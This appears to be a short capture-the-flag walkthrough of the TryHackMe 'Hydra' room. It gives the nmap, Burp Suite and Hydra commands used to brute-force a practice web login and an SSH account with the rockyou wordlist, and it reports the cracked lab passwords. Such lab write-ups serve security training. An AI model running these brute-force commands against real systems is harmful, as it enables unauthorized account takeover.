TryHackMe: Hydra
2 min readJun 11, 2020
- Use Hydra to bruteforce molly’s web password. What is flag 1?
Scan open ports
nmap -p- <ip>
Access HTTP site, try logging-in to see what happen
Seems like I don’t have correct credentials.
View source shows nothing
Press enter or click to view image in full size![]()
Intercept with Burp Suite. It’s POST request.
Press enter or click to view image in full size![]()
Try SQL injection, but It’s not work neither.
Without any further information. I’ll have to brute-forcing with hydra
Craft the command.
hydra -l molly -P rockyou.txt <ip> http-post-form "/loginusername=^USER^&password=^PASS^:F=Your username or password is incorrect." -VPress enter or click to view image in full size![]()
Run the command
Press enter or click to view image in full size![]()
Result -> molly:sunshine
Press enter or click to view image in full size![]()
Login, now I have first flag.
Press enter or click to view image in full size![]()
Press enter or click to view image in full size![]()
2. Use Hydra to bruteforce molly’s SSH password. What is flag 2?
hydra -l molly -P Desktop/rockyou.txt 10.10.138.145 ssh -t 4Result -> molly:butterfly
Press enter or click to view image in full size![]()
SSH login
ssh molly@<ip>
Read flag file
ls cat flag2.txt
Press enter or click to view image in full size![]()
